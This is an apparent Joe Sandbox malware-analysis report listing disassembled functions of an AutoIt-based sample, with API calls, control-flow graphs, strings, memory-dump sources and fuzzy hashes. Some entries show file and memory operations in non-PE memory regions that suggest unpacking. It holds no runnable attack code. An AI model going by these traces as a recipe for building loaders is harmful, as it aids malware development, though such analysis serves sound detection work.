                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                  • String ID: #$0$AutoIt v3
                                                                                                                                                  • API String ID: 423443420-4155596026
                                                                                                                                                  • Opcode ID: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                                                                                                                                                  • Instruction ID: 95199bfa57b98a40bbf2a31e3c8143aaf86e5cd3d1ec7ed5ae4cf298cf618104
                                                                                                                                                  • Opcode Fuzzy Hash: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                                                                                                                                                  • Instruction Fuzzy Hash: C4214874D00308AFEB50DFA4EC09F9D7BF4FB08711F1045BAE500A62A1D3B966948F88
                                                                                                                                                  Function 00A7CE90 Relevance: 16.2, APIs: 10, Instructions: 1207COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 19edc407825cce52eea09134cde590bd2fb46b739610e2103297ed04bd5629fa
                                                                                                                                                  • Instruction ID: be9ef2f66b9db8652bf956f779760dac068c5661b6891f5dcbcf2d48cd877f4a
                                                                                                                                                  • Opcode Fuzzy Hash: 19edc407825cce52eea09134cde590bd2fb46b739610e2103297ed04bd5629fa
                                                                                                                                                  • Instruction Fuzzy Hash: 89A269729093808FC735CB18CC547AABBF1AFD5328F09CA5DE59C97292D335A9048B97
                                                                                                                                                  Function 00403766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                                                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RL
                                                                                                                                                  • API String ID: 1825951767-3937808951
                                                                                                                                                  • Opcode ID: bdb735fbedb35e888c257e8634ea341575bcf89834c003d18e08814175aecafe
                                                                                                                                                  • Instruction ID: 217e4a9907ead401ca9bb1711b2953d037e75f133ca24ff269f2dfb0051b1760
                                                                                                                                                  • Opcode Fuzzy Hash: bdb735fbedb35e888c257e8634ea341575bcf89834c003d18e08814175aecafe
                                                                                                                                                  • Instruction Fuzzy Hash: DAA13CB29102199ACB04EFA1DC91EEEBB78BF14314F40053FE415B7191DB786A08CBA9
                                                                                                                                                  Function 0040F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00420162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                                                                                                                                                    • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                                                                                                                                                    • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                                                                                                                                                    • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                                                                                                                                                    • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                                                                                                                                                    • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                                                                                                                                                    • Part of subcall function 004160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0040F930), ref: 00416154
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0040F9CD
                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 0040FA4A
                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004445C8
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                  • String ID: <WL$\TL$%I$SL
                                                                                                                                                  • API String ID: 1986988660-4199584472
                                                                                                                                                  • Opcode ID: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                                                                                                                                                  • Instruction ID: cacde0f204b6a9090d7281a683cdea215049a4593ae0d5a2ec8f4d386ae10ecf
                                                                                                                                                  • Opcode Fuzzy Hash: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                                                                                                                                                  • Instruction Fuzzy Hash: 6581ADB4901A809EC3C8EF3AA944F5D7BE5AB9830A790853F9419C7272E77874C58F1D
                                                                                                                                                  Function 004039D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 2109 4039d5-403a45 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                  APIs
                                                                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                                                                                                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                                                                                                                                                  • ShowWindow.USER32(00000000,?,?), ref: 00403A38
                                                                                                                                                  • ShowWindow.USER32(00000000,?,?), ref: 00403A41
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$CreateShow
                                                                                                                                                  • String ID: AutoIt v3$edit
                                                                                                                                                  • API String ID: 1584632944-3779509399
                                                                                                                                                  • Opcode ID: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                                                                                                                                                  • Instruction ID: be7595edf0713681b26590b93805f6b8ae52c85786ba9eb407d90bea5093dcab
                                                                                                                                                  • Opcode Fuzzy Hash: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                                                                                                                                                  • Instruction Fuzzy Hash: 5DF03A705002907EEB705723AC48E2F2EBDD7C6F50B00407EB900E2170C2752881CEB8
                                                                                                                                                  Function 00BF6920 Relevance: 9.2, APIs: 6, Instructions: 151fileCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 2462 bf6920-bf6972 call bf6820 CreateFileW 2465 bf697b-bf6988 2462->2465 2466 bf6974-bf6976 2462->2466 2469 bf699b-bf69b2 VirtualAlloc 2465->2469 2470 bf698a-bf6996 2465->2470 2467 bf6ad4-bf6ad8 2466->2467 2471 bf69bb-bf69e1 CreateFileW 2469->2471 2472 bf69b4-bf69b6 2469->2472 2470->2467 2474 bf6a05-bf6a1f ReadFile 2471->2474 2475 bf69e3-bf6a00 2471->2475 2472->2467 2476 bf6a43-bf6a47 2474->2476 2477 bf6a21-bf6a3e 2474->2477 2475->2467 2478 bf6a49-bf6a66 2476->2478 2479 bf6a68-bf6a7f WriteFile 2476->2479 2477->2467 2478->2467 2482 bf6aaa-bf6acf VirtualFree 2479->2482 2483 bf6a81-bf6aa8 2479->2483 2482->2467 2483->2467
                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00BF6965
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1738404215.0000000000BF6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BF6000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_bf6000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                  • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                                                  • Instruction ID: 51788f229660c725dde1c14b5cc6b9f01939f9f0c76d433b03b1f5c28c87a219
                                                                                                                                                  • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                                                                  • Instruction Fuzzy Hash: 4C51DA75A50208FBDF20DFA4CC49FEE77B8EF48701F108554FA19EB180DA749A459B60
                                                                                                                                                  Function 0040407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 2493 40407c-404092 2494 404098-4040ad call 407a16 2493->2494 2495 40416f-404173 2493->2495 2498 4040b3-4040d3 call 407bcc 2494->2498 2499 43d3c8-43d3d7 LoadStringW 2494->2499 2501 43d3e2-43d3fa call 407b2e call 406fe3 2498->2501 2504 4040d9-4040dd 2498->2504 2499->2501 2511 4040ed-40416a call 422de0 call 40454e call 422dbc Shell_NotifyIconW call 405904 2501->2511 2515 43d400-43d41e call 407cab call 406fe3 call 407cab 2501->2515 2505 4040e3-4040e8 call 407b2e 2504->2505 2506 404174-40417d call 408047 2504->2506 2505->2511 2506->2511 2511->2495 2515->2511
                                                                                                                                                  APIs
                                                                                                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0043D3D7
                                                                                                                                                    • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                  • _memset.LIBCMT ref: 004040FC
                                                                                                                                                  • _wcscpy.LIBCMT ref: 00404150
                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                                                  • String ID: Line:
                                                                                                                                                  • API String ID: 3942752672-1585850449
                                                                                                                                                  • Opcode ID: d21009a627d630a93433c35e80ef480998eb63dd03275a386dfb8ac04053bcd4
                                                                                                                                                  • Instruction ID: 5bc5e1414a994c2bc470de53771d73d2d6dd5f3f474fa0ef1b1349c24bbf7672
                                                                                                                                                  • Opcode Fuzzy Hash: d21009a627d630a93433c35e80ef480998eb63dd03275a386dfb8ac04053bcd4
                                                                                                                                                  • Instruction Fuzzy Hash: 0C31A0B1408305AAD360EB61DC45FDF77E8AB84308F10493FB685A21D1DB78A649CB9F
                                                                                                                                                  Function 0042541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 2528 42541d-425436 2529 425453 2528->2529 2530 425438-42543d 2528->2530 2531 425455-42545b 2529->2531 2530->2529 2532 42543f-425441 2530->2532 2533 425443-425448 call 428b28 2532->2533 2534 42545c-425461 2532->2534 2542 42544e call 428db6 2533->2542 2535 425463-42546d 2534->2535 2536 42546f-425473 2534->2536 2535->2536 2538 425493-4254a2 2535->2538 2539 425483-425485 2536->2539 2540 425475-425480 call 422de0 2536->2540 2545 4254a4-4254a7 2538->2545 2546 4254a9 2538->2546 2539->2533 2544 425487-425491 2539->2544 2540->2539 2542->2529 2544->2533 2544->2538 2549 4254ae-4254b3 2545->2549 2546->2549 2550 4254b9-4254c0 2549->2550 2551 42559c-42559f 2549->2551 2552 4254c2-4254ca 2550->2552 2553 425501-425503 2550->2553 2551->2531 2552->2553 2554 4254cc 2552->2554 2555 425505-425507 2553->2555 2556 42556d-42556e call 430ba7 2553->2556 2557 4254d2-4254d4 2554->2557 2558 4255ca 2554->2558 2559 42552b-425536 2555->2559 2560 425509-425511 2555->2560 2569 425573-425577 2556->2569 2564 4254d6-4254d8 2557->2564 2565 4254db-4254e0 2557->2565 2566 4255ce-4255d7 2558->2566 2562 42553a-42553d 2559->2562 2563 425538 2559->2563 2567 425513-42551f 2560->2567 2568 425521-425525 2560->2568 2570 4255a4-4255a8 2562->2570 2571 42553f-42554b call 4246e6 call 430e5b 2562->2571 2563->2562 2564->2565 2565->2570 2572 4254e6-4254ff call 430cc8 2565->2572 2566->2531 2573 425527-425529 2567->2573 2568->2573 2569->2566 2574 425579-42557e 2569->2574 2575 4255ba-4255c5 call 428b28 2570->2575 2576 4255aa-4255b7 call 422de0 2570->2576 2589 425550-425555 2571->2589 2588 425562-42556b 2572->2588 2573->2562 2574->2570 2579 425580-425591 2574->2579 2575->2542 2576->2575 2584 425594-425596 2579->2584 2584->2550 2584->2551 2588->2584 2590 42555b-42555e 2589->2590 2591 4255dc-4255e0 2589->2591 2590->2558 2592 425560 2590->2592 2591->2566 2592->2588
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1559183368-0
                                                                                                                                                  • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                                                                  • Instruction ID: c535a9b74c3be08fb66675131960c2e3f57dfdec9721024cad96d7a05cd33cf3
                                                                                                                                                  • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                                                                  • Instruction Fuzzy Hash: 9051BB30B00B15EBCB149E65F84066FB7B2AF40325F94472FF825963D4D7789D918B49
                                                                                                                                                  Function 0040686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00404DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                                                                                                                                                  • _free.LIBCMT ref: 0043E263
                                                                                                                                                  • _free.LIBCMT ref: 0043E2AA
                                                                                                                                                    • Part of subcall function 00406A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                                                  • API String ID: 2861923089-1757145024
                                                                                                                                                  • Opcode ID: 25f7fc4f1835b3533dd58efb0dfe797f6598f87ef585f97ea147526d1d8effbf
                                                                                                                                                  • Instruction ID: bc1048028433ed9b22f3ef3a1c1c6008be5ef254c57e4e777beaa03c5b85f979
                                                                                                                                                  • Opcode Fuzzy Hash: 25f7fc4f1835b3533dd58efb0dfe797f6598f87ef585f97ea147526d1d8effbf
                                                                                                                                                  • Instruction Fuzzy Hash: 0D916E71901229AFCF04EFA6C8419EEB7B4FF08314F10446FE815AB2E1DB78A955CB59
                                                                                                                                                  Function 00BF8400 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BF82F0: Sleep.KERNEL32(000001F4), ref: 00BF8301
                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00BF84FF
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1738404215.0000000000BF6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BF6000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_bf6000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFileSleep
                                                                                                                                                  • String ID: OJYYVSZ8BPB5
                                                                                                                                                  • API String ID: 2694422964-3797447477
                                                                                                                                                  • Opcode ID: 13facc4e1aa80b72e9722433d578ab95797f1d33699e802ef6a0de907f4d8aab
                                                                                                                                                  • Instruction ID: c0fb8bcb8f275bd194bd3816874bcb287dfee9fa5607e5501194157c0c5fb44b
                                                                                                                                                  • Opcode Fuzzy Hash: 13facc4e1aa80b72e9722433d578ab95797f1d33699e802ef6a0de907f4d8aab
                                                                                                                                                  • Instruction Fuzzy Hash: 84515D31D04249DBEF10DBA4C855BFFBBB9AF14300F104598E619BB2C0DA795B49CBA5
                                                                                                                                                  Function 004035B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004035A1,SwapMouseButtons,00000004,?), ref: 004035D4
                                                                                                                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 004035F5
                                                                                                                                                  • RegCloseKey.KERNEL32(00000000,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 00403617
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                  • String ID: Control Panel\Mouse
                                                                                                                                                  • API String ID: 3677997916-824357125
                                                                                                                                                  • Opcode ID: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                                                                                                                                                  • Instruction ID: b1ff216ba3ee978410a1c1c06e663b0c2c98cd46aaa17f39490786bf8a1b1252
                                                                                                                                                  • Opcode Fuzzy Hash: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                                                                                                                                                  • Instruction Fuzzy Hash: 84114871510208BFDB20CF64DC409AFBBBCEF45741F10486AE805E7250D6729E449768
                                                                                                                                                  Function 0046955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                                                                                                                                                    • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                                                                                                                                                    • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                                                                                                                                                  • _free.LIBCMT ref: 004696A2
                                                                                                                                                  • _free.LIBCMT ref: 004696A9
                                                                                                                                                  • _free.LIBCMT ref: 00469714
                                                                                                                                                    • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                                                                                                                                                    • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                                                                                                                                                  • _free.LIBCMT ref: 0046971C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1552873950-0
                                                                                                                                                  • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                                                                                  • Instruction ID: ca2eec8eb8578c2366e6fbf42eaf411172dd757ca1b938988fe54b4571807f9b
                                                                                                                                                  • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
